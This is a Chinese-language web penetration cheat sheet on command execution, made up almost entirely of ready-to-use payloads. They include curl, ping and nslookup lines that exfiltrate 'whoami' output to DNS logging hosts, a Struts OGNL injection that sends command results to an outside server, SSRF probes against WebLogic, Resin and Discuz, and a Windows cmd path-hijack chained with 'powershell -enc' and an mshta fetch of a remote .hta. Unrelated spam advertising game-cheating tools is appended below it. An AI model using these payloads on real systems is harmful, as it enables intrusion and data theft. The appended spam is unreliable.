WEB渗透Web突破篇-命令执行
创始人
2024-11-04 19:08:44
0
命令执行
>curl http://0ox095.ceye.io/`whoami` >ping `whoami`.b182oj.ceye.io >ping %CD%.lfofz7.dnslog.cn  & cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.ceye.io && nslookup !FINAL!" 
XXE
  %remote;]>  
Struts
xx.action?redirect:http://b182oj.ceye.io/%25{3*4} xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} 
weblogic
/uddiexplorer/SearchPublicRegistries.jsp?operator=http://b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search 
Resin
xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://b182oj.ceye.io/ssrf 
Discuz
/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo 
CmdHijack
From: https://hackingiscool.pl/ poc完整的命令行 cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe" 可能产生的影响 包括拒绝服务,信息泄露,任意代码执行(取决于目标应用程序和系统)。 以web应用为例 

image

由于使用了escapeshellcmd(),不易受命令注入的影响,使用本方法 一个poc 

image

image

不限于任何位置,文件 

image

再扩展一下  如,powershell带-enc执行,或mshta等方法,可参考 https://lolbas-project.github.io/,但是依照windows的特性,在无法将完整字符串解析为有效路径的情况下,会拆分空格后面的内容,这里可以使用&符号 如: >cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&powershell -enc xxxx" >cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&mshta http://192.168.0.105:8080/xsuUEWJ.hta" 

相关内容

热门资讯

四分钟辅助!广东雀神智能插件试... 四分钟辅助!广东雀神智能插件试用免费(辅助挂)都是真的有辅助攻略(真是有挂)广东雀神智能插件试用免费...
据统计!wepoker手机版辅... 据统计!wepoker手机版辅助,新超圣辅助靠谱不,积累教程(今日头条)新超圣辅助靠谱不是不是有人用...
五分钟辅助!掌中乐辅助(辅助挂... 五分钟辅助!掌中乐辅助(辅助挂)果然是真的辅助神器(确实有挂)1、玩家可以在掌中乐辅助透视最简单三个...
现场直击!wpk透视辅助靠谱吗... 现场直击!wpk透视辅助靠谱吗,微信小程序哥哥打大a辅助器,手段教程(果真有挂)1、微信小程序哥哥打...
第二分钟辅助!新星游辅助软件试... 第二分钟辅助!新星游辅助软件试用版(辅助挂)都是真的是有辅助app(有挂教程)新星游辅助软件试用版破...
据悉!wpk俱乐部辅助器,广西... 据悉!wpk俱乐部辅助器,广西老友修改器,策略教程(今日头条)1、打开软件启动之后找到中间准星的标志...
第3分钟辅助!微信闲来辅助神器... 第3分钟辅助!微信闲来辅助神器app(辅助挂)本来真的是有辅助插件(有挂头条)1、起透看视 微信闲来...
2026版总结!wpk透视插件... 2026版总结!wpk透视插件,老k麻将辅助器,方式教程(有挂规律)1、全新机制【老k麻将辅助器ai...
教学辅助挂!菠萝辅助器免费版的... 教学辅助挂!菠萝辅助器免费版的特点,赣牌圈插件,积累教程(有挂解惑)1、赣牌圈插件透视辅助软件激活码...
4分钟辅助!浙江游戏茶苑脚本修... 4分钟辅助!浙江游戏茶苑脚本修改(辅助挂)其实存在有辅助工具(果真有挂)1、上手简单,内置详细流程视...